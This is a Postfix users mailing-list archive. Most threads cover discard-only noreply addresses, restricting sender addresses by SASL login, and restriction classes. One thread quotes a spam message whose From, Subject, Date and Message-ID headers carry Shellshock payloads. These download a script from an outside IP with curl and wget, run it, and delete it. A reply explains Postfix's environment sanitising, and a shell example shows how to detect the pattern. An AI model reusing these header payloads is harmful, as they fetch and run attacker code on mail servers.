Re: Adding a noreply address

2016-01-27 Thread Wietse Venema
Viktor Dukhovni:
> On Wed, Jan 27, 2016 at 04:03:08PM -0500, Wietse Venema wrote:
> 
> > @lbutlr:
> > > On 27 Jan 2016, at 05:46, Mick  wrote:
> > > >  'nore...@domain.com' needs to exist as a mailbox in order for you to 
> > > > discard mail to it as far as I can tell. 
> > > 
> > > Obviously not, since Wietse posted:
> > > 
> > > transport_maps = inline:{u...@example.com=discard:}
> > 
> > Unfortunately, transport_maps does not decide what addresses are valid;
> > that decision is based on virtual_alias_maps, local_recipient_maps,
> > relay_recipient_maps, and virtual_mailbox_maps.
> 
> Isn't there a special case if the target transport is "error".
> 
> transport_maps = inline:{{u...@example.com = error:5.1.1 Mailbox unavailable}}

I should have written: the discard transport does not decide 
what addresses are valid. The error transport makes a different
decision, namely, that an address is invalid.

Wietse


Re: How to block sending outgoing mail from other domains in from field

2016-01-27 Thread Amit Bondwal
Thank you very much Jones, it solved the issue after mapping system users to
email addresses.

On Wed, Jan 27, 2016 at 8:10 PM, Noel Jones  wrote:

> On 1/27/2016 1:21 AM, Amit Bondwal wrote:
> > Hi Everyone,
> >
> > In my postfix mail server, users are able to send mail on name of
> > different domains
> > using from field in mail client software.
> >
> > For eg. I am using sendEmail mail client, and I can send emails with
> > hdfc.com  domain or other too,
> >
> > sendEmail -v -f "a...@hdfc.com " -s
> > "test.example.in:25 " -xu "amit" -xp
> > "ami*321" -t "x...@yahoo.co.in "  -u "test
> > from sendEmaili 0255" -m "this is sendEmail test"
> >
> > This mail goes to spam and it did not show actual mail address in
> > details header.
> >
> > How Can I restrict my outgoing mails such that it can only send
> > outgoing mails which have my domain  test.example.in
> > ? or it would be great if I can map user's
> > too that user can't use other users name.
> >
> > If only first case work that will be sufficient for me.
> >
> > I searched a lot but not able to do this. my postfix version is
> > 2.11.3-1 on debian Jessie. My setup have just postfix with sasl
> > authentication, authentication is working fine.
> >
> >
> > --
> > Thanks
> >
> > Amit Bondwal
> >
> >
> >
> >
>
>
> You can map sasl login names to allowed MAIL FROM names using
> reject_sender_login_mismatch (or the
> reject_authenticated_sender_login_mismatch,
> reject_unauthenticated_sender_login_mismatch variants).
> http://www.postfix.org/postconf.5.html#reject_sender_login_mismatch
>
>
>
>   -- Noel Jones
>


is postfix vulnerable to this kind of attack?

2016-01-27 Thread Louis Kowolowski
I found an interesting email that got caught in my spam quarantine. I’m 
wondering if postfix is vulnerable to this kind of code execution (I’m aware 
that other components could be vulnerable, but this question is specifically 
targeting postfix).

The idea is to insert shell commands into various header fields that would get 
executed as part of the message processing/delivery.

Examples include:

From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download 
http: //62.75.175.145/ex...@nes.txt.com;,
w...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;,
fe...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;, s...@nes.txt.com,
ex...@nes.txt.com;, r...@nes.txt.com, -f...@nes.txt.com,
ex.*'@nes.txt.com, &@nes.txt.com;

Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download 
http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 
62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

The full message, should it be of interest, can be found here:

https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt 


Thank you!

--
Louis Kowolowski    lou...@cryptomonkeys.org

Cryptomonkeys:   http://www.cryptomonkeys.com/ 


Making life more interesting for people since 1977





Re: is postfix vulnerable to this kind of attack?

2016-01-27 Thread Viktor Dukhovni
On Wed, Jan 27, 2016 at 10:54:50AM -0800, Louis Kowolowski wrote:

> I found an interesting email that got caught in my spam quarantine. I'm
> wondering if postfix is vulnerable to this kind of code execution (I'm
> aware that other components could be vulnerable, but this question is
> specifically targeting postfix).

Postfix does not inject message headers into the environment and
is not itself vulnerable to the shellshock Bash attack nor does
Postfix directly expose delivery programs to the attack.

The local(8) delivery agent does export some envelope data into
the environment of delivery scripts, but these are sanitised:

   A  limited  amount of message context is exported via environment vari‐
   ables. Characters that may  have  special  meaning  to  the  shell  are
   replaced  by  underscores.  The list of acceptable characters is speci‐
   fied with the command_expansion_filter configuration parameter.

See local(8) for details.

Users who write pipe(8) processing programs can of course eval the
message as a shell script if they are so determined, we can't stop
them from doing that.

-- 
Viktor.
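
The sanitising step quoted from local(8) above, as an added example that is not part of the original post or of Postfix itself. It assumes the allowed-character list is the stock command_expansion_filter value printed by "postconf -d"; the function names and the sample sender are constructed for illustration.

```shell
#!/bin/sh
# Allowed characters: the stock command_expansion_filter value (assumption:
# compare with "postconf -d command_expansion_filter" on your own system).
# The "-" is moved to the end so that tr reads it as a literal character
# and not as the range "%-_", which would let "(", ")" and ";" through.
ALLOWED='1234567890!@%_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-'

# filter_for_env VALUE
# Replace every character outside ALLOWED with "_", the behaviour local(8)
# documents for envelope data exported to delivery commands.
filter_for_env() {
    printf '%s' "$1" | LC_ALL=C tr -c "$ALLOWED" '_'
}

# is_function_import VALUE
# True when VALUE starts with "() {", the prefix an unpatched bash parsed as
# a function definition when it appeared in an environment variable.
is_function_import() {
    case $1 in
        '() {'*) return 0 ;;
        *)       return 1 ;;
    esac
}

# Constructed envelope sender, shaped like the headers quoted in the
# question but carrying a harmless command.
SAMPLE_SENDER='() { :; }; echo probe@example.com'

filtered=$(filter_for_env "$SAMPLE_SENDER")
printf 'raw:      %s\nfiltered: %s\n' "$SAMPLE_SENDER" "$filtered"

if is_function_import "$filtered"; then
    echo 'filtered value still looks like a function definition'
else
    echo 'filtered value no longer looks like a function definition'
fi
```

A pipe(8) or .forward script that reads headers out of the message body itself gets no such filtering, which is the caveat in the last paragraph of the reply.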


Re: is postfix vulnerable to this kind of attack?

2016-01-27 Thread Louis Kowolowski
On Jan 27, 2016, at 11:24 AM, Viktor Dukhovni  
wrote:
> 
> On Wed, Jan 27, 2016 at 10:54:50AM -0800, Louis Kowolowski wrote:
> 
>> I found an interesting email that got caught in my spam quarantine. I'm
>> wondering if postfix is vulnerable to this kind of code execution (I'm
>> aware that other components could be vulnerable, but this question is
>> specifically targeting postfix).
> 
> Postfix does not inject message headers into the environment and
> is not itself vulnerable to the shellshock Bash attack nor does
> Postfix directly expose delivery programs to the attack.
> 
> The local(8) delivery agent does export some envelope data into
> the environment of delivery scripts, but these are sanitised:
> 
>   A  limited  amount of message context is exported via environment vari‐
>   ables. Characters that may  have  special  meaning  to  the  shell  are
>   replaced  by  underscores.  The list of acceptable characters is speci‐
>   fied with the command_expansion_filter configuration parameter.
> 
> See local(8) for details.
> 
> Users who write pipe(8) processing programs can of course eval the
> message as a shell script if they are so determined, we can't stop
> them from doing that.
> 
Perfect. That’s what I was hoping for.

Thanks Viktor!

--
Louis Kowolowski    lou...@cryptomonkeys.org

Cryptomonkeys:   http://www.cryptomonkeys.com/ 


Making life more interesting for people since 1977





Re: Adding a noreply address

2016-01-27 Thread @lbutlr
On 27 Jan 2016, at 05:46, Mick  wrote:
>  'nore...@domain.com' needs to exist as a mailbox in order for you to discard 
> mail to it as far as I can tell. 

Obviously not, since Wietse posted:

transport_maps = inline:{u...@example.com=discard:}



-- 
The Nixon I remembered was absolutely humorless; I couldn't imagine
him laughing at anything except maybe a paraplegic who wanted to vote
Democratic but couldn't quite reach the lever on the voting machine.
— Hunter S Thompson



Re: Adding a noreply address

2016-01-27 Thread Wietse Venema
@lbutlr:
> On 27 Jan 2016, at 05:46, Mick  wrote:
> >  'nore...@domain.com' needs to exist as a mailbox in order for you to 
> > discard mail to it as far as I can tell. 
> 
> Obviously not, since Wietse posted:
> 
> transport_maps = inline:{u...@example.com=discard:}

Unfortunately, transport_maps does not decide what addresses are valid;
that decision is based on virtual_alias_maps, local_recipient_maps,
relay_recipient_maps, and virtual_mailbox_maps.

Wietse


Re: Adding a noreply address

2016-01-27 Thread Mick

Indeed.

On 27/01/2016 20:45, @lbutlr wrote:
> On 27 Jan 2016, at 05:46, Mick  wrote:
> > 'nore...@domain.com' needs to exist as a mailbox in order for you to discard
> > mail to it as far as I can tell.
>
> Obviously not, since Wietse posted:
>
> transport_maps = inline:{u...@example.com=discard:}







Re: Adding a noreply address

2016-01-27 Thread Mick
Prior to Wietse's earlier post on this thread, I didn't know you could 
alias a non existent address back on itself  in order to make the 
address known to Postfix.  That's simply clever!  I did know you can't 
silently discard messages using Transport if the address didn't exist, 
nor by aliasing such an address to an existing mailbox if the 
destination accepts mail.  I don't reject  'noreply' addresses myself, 
but would opt for Wietse's method should I ever feel the need to do 
so.   Both methods work though.


Mick.

On 27/01/2016 21:03, Wietse Venema wrote:
> @lbutlr:
> > On 27 Jan 2016, at 05:46, Mick  wrote:
> > > 'nore...@domain.com' needs to exist as a mailbox in order for you to discard
> > > mail to it as far as I can tell.
> >
> > Obviously not, since Wietse posted:
> >
> > transport_maps = inline:{u...@example.com=discard:}
>
> Unfortunately, transport_maps does not decide what addresses are valid;
> that decision is based on virtual_alias_maps, local_recipient_maps,
> relay_recipient_maps, and virtual_mailbox_maps.
>
> Wietse





Re: Adding a noreply address

2016-01-27 Thread Viktor Dukhovni
On Wed, Jan 27, 2016 at 04:03:08PM -0500, Wietse Venema wrote:

> @lbutlr:
> > On 27 Jan 2016, at 05:46, Mick  wrote:
> > >  'nore...@domain.com' needs to exist as a mailbox in order for you to 
> > > discard mail to it as far as I can tell. 
> > 
> > Obviously not, since Wietse posted:
> > 
> > transport_maps = inline:{u...@example.com=discard:}
> 
> Unfortunately, transport_maps does not decide what addresses are valid;
> that decision is based on virtual_alias_maps, local_recipient_maps,
> relay_recipient_maps, and virtual_mailbox_maps.

Isn't there a special case if the target transport is "error".

transport_maps = inline:{{u...@example.com = error:5.1.1 Mailbox unavailable}}

-- 
Viktor.


Fwd: Adding a noreply address

2016-01-27 Thread Matt Bayliss
Firstly, thanks for all the replies.  Forget I said best practices, I agree
it's a rubbish term - what I really meant was the best way to achieve what
I want.

I suppose I really have two requirements.  1) Monitoring devices that use
this Postfix installation as a relay should be able to set the FROM address
to an address that no one will ever read replies to, but that the mail
server is "happy" with.  In the event that the address finds its way onto
some UCE list I never want an (unmanaged) mailbox to fill, hence the desire
for email it does receive, sent to /dev/null.

The other, separate requirement is 2) To be able to place a valid address
in the To: field for BCC: group emails so that customers see "All Clients"
or something instead of just the From address.  Again, no-one will need to
read email sent to this address as any replies will be sent to the valid
from/reply-to address.


Since I am running 2.3.3 I tried Wietse's suggestion:


I placed the following line in /etc/postfix/main.cf:

transport_maps = hash:/etc/postfix/transport

And added...

nore...@domain.com    discard

...to /etc/postfix/transport

Then I did:

postmap hash:/etc/postfix/transport

...and...

postfix reload


However when I send mail to nore...@domain.com from an external source
(Gmail) I get a bounceback and "Recipient address rejected: User unknown in
local recipient table;" in the log.


Similarly when I try to use it in a To: address field I get the same
response.


Thanks,




Re: Adding a noreply address

2016-01-27 Thread Darac Marjal

On Tue, Jan 26, 2016 at 03:54:51PM +, Matt Bayliss wrote:

 

> I'm trying to find the correct/best practice method for setting up a black hole
> email address for such items as "noreply" addresses when sending alerts from
> monitoring devices etc.


RFC 6854 adds the ability to use "Group Addresses" in the sender fields.  
That is, similar to how you can have "undisclosed recipients", you can 
have "undisclosed sender". So:


From: Promotional Mail Bot:;
To: Bob 
Subject: Buy More Widgets!
Date: 12th of Never

Hi Bob,

Don't forget to buy more widgets from us!

WidgetCo

The list of people in the group is optional, so you could also do:

From: Doctors Surgery:drn...@example.org,drhibb...@example.org;
...

Mind you, I've never actually seen RFC6854-syntax in the wild.



> I have come across a couple of tutorials which has instructions such as:
>
> " edit the /etc/postfix/aliases file and add there as bottom line:
>
> devnull: /dev/null
>
> - rebuild the aliases.db file with the command:
>
> newaliases
>
> - edit the /etc/postfix/virtual file and add as bottom line (replace the [1]
> example.com domain with your main virtual domain):
>
> [2]blackh...@example.com devnull
>
> - rebuild virtual.db file with the command:
>
> postmap /etc/postfix/virtual
>
> Now create a mail user or alias that is forwarded to [3]blackh...@example.com ...
> that's all!"
>
> So I don't really want to create a user on the system unless its really
> necessary so how would I alias it, is that not already done when editing
> /etc/postfix/aliases.p, all I really want is a specific address in the mail domain
> to silently accept and drop any mail sent to it.
>
> Error in log is Recipient address rejected: User unknown in local recipient table;
> from=<> to=[4]nore...@domain.com
>
> Thanks,
>
> References:
>
> [1] http://example.com/
> [2] mailto:blackh...@example.com
> [3] mailto:blackh...@example.com
> [4] mailto:nore...@domain.com


--
For more information, please reread.




SV: Adding a noreply address

2016-01-27 Thread Sebastian Nielsen
I would suggest against this, since there is a risk that servers aren't 
supporting this, and might deny the mail, discard it (send it to /dev/null, 
which I do with obvious spam), quarantine it or sort it to the end user's spam 
folder.

It's better to set up a nore...@yourdomain.tld address set to DISCARD. Doing this 
will also "circumvent" sender address verification, which some (un-serious) mail 
systems do.

-----Original Message-----
From: owner-postfix-us...@postfix.org [mailto:owner-postfix-us...@postfix.org] 
On behalf of Darac Marjal
Sent: 27 January 2016 11:26
To: postfix-users@postfix.org
Subject: Re: Adding a noreply address [Invalid]

On Tue, Jan 26, 2016 at 03:54:51PM +, Matt Bayliss wrote:
> 
>
>I'm trying to find the correct/best practice method for setting up a 
>black hole email address for such items as "noreply" addresses when 
>sending alerts from monitoring devices etc.

RFC 6854 adds the ability to use "Group Addresses" in the sender fields.  
That is, similar to how you can have "undisclosed recipients", you can have 
"undisclosed sender". So:

From: Promotional Mail Bot:;
To: Bob 
Subject: Buy More Widgets!
Date: 12th of Never

Hi Bob,

Don't forget to buy more widgets from us!

WidgetCo

The list of people in the group is optional, so you could also do:

From: Doctors Surgery:drn...@example.org,drhibb...@example.org;
...

Mind you, I've never actually seen RFC6854-syntax in the wild.

>
>I have come across a couple of tutorials which has instructions such as:
>
>
>
>" edit the /etc/postfix/aliases file and add there as bottom line:
>
>devnull: /dev/null
>
>- rebuild the aliases.db file with the command:
>
>newaliases
>
>- edit the /etc/postfix/virtual file and add as bottom line (replace 
>the [1] example.com domain with your main virtual domain):
>
>[2]blackh...@example.com devnull
>
>- rebuild virtual.db file with the command:
>
>postmap /etc/postfix/virtual
>
> 
>
>Now create a mail user or alias that is forwarded to [3]blackh...@example.com 
>... that's all!"
>
>
>
>So I don't really want to create a user on the system unless its really 
>necessary so how would I alias it, is that not already done when 
>editing /etc/ postfix/aliases.p, all I really want is a specific 
>address in the mail domain to silently accept and drop any mail sent to it.
>
>Error in log is Recipient address rejected: User unknown in local 
>recipient table; from=<> to=[4]nore...@domain.com
>
>Thanks,
>
> 
>
>
>References:
>
>[1] http://example.com/
>[2] mailto:blackh...@example.com
>[3] mailto:blackh...@example.com
>[4] mailto:nore...@domain.com

--
For more information, please reread.





Re: Returning from custom restriction class and proceed with the remaining checks

2016-01-27 Thread Noel Jones
On 1/27/2016 8:18 AM, Igor Sverkos wrote:
> Hi,
> 
> OK, when I jump from smtpd_client_restrictions via check_*_access into
> a custom restriction class a "DUNNO" to end (skip) the custom
> restriction class will send me back to smtpd_client_restrictions.
> 
> Can I get postfix's dnswl_client check to return with DUNNO when I
> want this check to decide if I want to end (skip) a custom restriction
> class?
> 
> Thanks!
> 
> 


No.  Put the continued restrictions in smtpd_helo_restrictions.


  -- Noel Jones


Re: How to block sending outgoing mail from other domains in from field

2016-01-27 Thread Noel Jones
On 1/27/2016 1:21 AM, Amit Bondwal wrote:
> Hi Everyone,
> 
> In my postfix mail server, users are able to send mail on name of
> different domains
> using from field in mail client software.
> 
> For eg. I am using sendEmail mail client, and I can send emails with
> hdfc.com  domain or other too,
> 
> sendEmail -v -f "a...@hdfc.com " -s
> "test.example.in:25 " -xu "amit" -xp
> "ami*321" -t "x...@yahoo.co.in "  -u "test
> from sendEmaili 0255" -m "this is sendEmail test"
> 
> This mail goes to spam and it did not show actual mail address in
> details header.
> 
> How Can I restrict my outgoing mails such that it can only send
> outgoing mails which have my domain  test.example.in
> ? or it would be great if I can map user's
> too that user can't use other users name.
> 
> If only first case work that will be sufficient for me.
> 
> I searched a lot but not able to do this. my postfix version is
> 2.11.3-1 on debian Jessie. My setup have just postfix with sasl
> authentication, authentication is working fine.
> 
> 
> --
> Thanks
> 
> Amit Bondwal
> 
> 
>  
> 


You can map sasl login names to allowed MAIL FROM names using
reject_sender_login_mismatch (or the
reject_authenticated_sender_login_mismatch,
reject_unauthenticated_sender_login_mismatch variants).
http://www.postfix.org/postconf.5.html#reject_sender_login_mismatch



  -- Noel Jones
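
A simplified model of the decision reject_sender_login_mismatch makes, added here as an example and not taken from the thread or from Postfix's source. The map contents, addresses, function names and the file path in the comment are constructed; only exact-address keys are modelled, whereas Postfix also tries other lookup keys.

```shell
#!/bin/sh
# Configuration this models (the map path is an assumption):
#   smtpd_sender_login_maps   = hash:/etc/postfix/sender_login_maps
#   smtpd_sender_restrictions = reject_sender_login_mismatch, ...

# Constructed table in the same layout as the Postfix map:
# MAIL FROM address, then the SASL login(s) that own it.
SENDER_LOGIN_MAP='amit@test.example.in    amit
sales@test.example.in   amit,ravi
ravi@test.example.in    ravi'

# owners_of ADDRESS
# Print the owner list for ADDRESS; print nothing if it has no entry.
owners_of() {
    printf '%s\n' "$SENDER_LOGIN_MAP" |
        awk -v key="$1" '$1 == key { print $2; exit }'
}

# check_sender LOGIN MAIL_FROM
# LOGIN is the SASL login name, or "" for a client that did not log in.
# Prints REJECT or OK; OK only means this one restriction does not object,
# later restrictions still apply.
check_sender() {
    login=$1
    owners=$(owners_of "$2")

    if [ -z "$login" ]; then
        # Not logged in: reject only when the address belongs to somebody.
        if [ -n "$owners" ]; then echo REJECT; else echo OK; fi
        return
    fi

    # Logged in: the login must be listed as an owner of MAIL FROM.
    # An address with no entry has no owners, so it is rejected too,
    # which is what blocks senders in foreign domains.
    case ",$owners," in
        *",$login,"*) echo OK ;;
        *)            echo REJECT ;;
    esac
}

printf '%-8s %-26s %s\n' login 'MAIL FROM' result
for pair in 'amit amit@test.example.in' 'amit someone@other.example' \
            'amit ravi@test.example.in' 'ravi sales@test.example.in'; do
    set -- $pair
    printf '%-8s %-26s %s\n' "$1" "$2" "$(check_sender "$1" "$2")"
done
```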


Re: Fwd: Adding a noreply address

2016-01-27 Thread Wietse Venema
Matt Bayliss:
> Firstly, thanks for all the replies.  Forget I said best practices, I agree
> it's a rubbish term - what I really meant was the best way to achieve what
> I want.
> 
> I suppose I really have two requirements.  1) Monitoring devices that use
> this Postfix installation as a relay should be able to set the FROM address
> to an address that no one will ever read replies to, but that the mail
> server is "happy" with.  In the event that the address finds its way onto
> some UCE list I never want an (unmanaged) mailbox to fill, hence the desire
> for email it does receive, sent to /dev/null.
> 
> The other, separate requirement is 2) To be able to place a valid address
> in the To: field for BCC: group emails so that customers see "All Clients"
> or something instead of just the From address.  Again, no-one will need to
> read email sent to this address as any replies will be sent to the valid
> from/reply-to address.
> 
> 
> Since I am running 2.3.3 I tried Wietse's suggestion:
> 
> 
> I placed the following line in /etc/postfix/main.cf:
> 
> transport_maps = hash:/etc/postfix/transport
> 
> And added...
> 
> nore...@domain.com    discard
> 
> ...to /etc/postfix/transport
> 
> Then I did:
> 
> postmap hash:/etc/postfix/transport
> 
> ...and...
> 
> postfix reload
> 
> 
> However when I send mail to nore...@domain.com from an external source
> (Gmail) I get a bounceback and "Recipient address rejected: User unknown in
> local recipient table;" in the log.

In that case, create a virtual alias nore...@domain.com->nore...@domain.com
(so that the address is "known"), or use an access map with a "discard"
action as suggested in this thread (so that it never reaches the
code path that tests the "user unknown" condition).

Wietse
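
The first option in the reply above (identity virtual alias plus discard transport) written out as a small helper, as an added example that is not code from the thread. The function names and the address noreply@example.com are constructed; the file names follow the ones used earlier in the thread, and the script only edits the table files.

```shell
#!/bin/sh
# main.cf must already point at both tables:
#   virtual_alias_maps = hash:/etc/postfix/virtual
#   transport_maps     = hash:/etc/postfix/transport

# add_map_entry FILE KEY VALUE
# Append "KEY<TAB>VALUE" unless KEY already has an entry, so the helper can
# be re-run without creating duplicate keys.
add_map_entry() {
    touch "$1"
    if ! awk -v k="$2" '$1 == k { found = 1 } END { exit !found }' "$1"; then
        printf '%s\t%s\n' "$2" "$3" >> "$1"
    fi
}

# setup_noreply DIR ADDRESS
# Write the two entries that together give a discard-only address.
setup_noreply() {
    dir=$1
    addr=$2
    # 1. Alias the address to itself so the recipient validity checks
    #    treat it as known (avoids "User unknown in local recipient table").
    add_map_entry "$dir/virtual" "$addr" "$addr"
    # 2. Route the now-valid address to the discard transport.
    add_map_entry "$dir/transport" "$addr" "discard:"
}

# Typical use on the mail server, followed by rebuilding the tables:
#   setup_noreply /etc/postfix noreply@example.com
#   postmap /etc/postfix/virtual /etc/postfix/transport
#   postfix reload
```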


Re: Returning from custom restriction class and proceed with the remaining checks

2016-01-27 Thread Igor Sverkos
Hi,

OK, when I jump from smtpd_client_restrictions via check_*_access into
a custom restriction class a "DUNNO" to end (skip) the custom
restriction class will send me back to smtpd_client_restrictions.

Can I get postfix's dnswl_client check to return with DUNNO when I
want this check to decide if I want to end (skip) a custom restriction
class?

Thanks!


-- 
Regards,
Igor


Re: Fwd: Adding a noreply address

2016-01-27 Thread Mick




On 27/01/2016 12:00, Matt Bayliss wrote:

> However when I send mail to nore...@domain.com from an external source
> (Gmail) I get a bounceback and "Recipient address rejected: User unknown in
> local recipient table;" in the log.
>
> Similarly when I try to use it in a To: address field I get the same
> response.

'nore...@domain.com' needs to exist as a mailbox in order for you to
discard mail to it as far as I can tell.

Mick

> Thanks,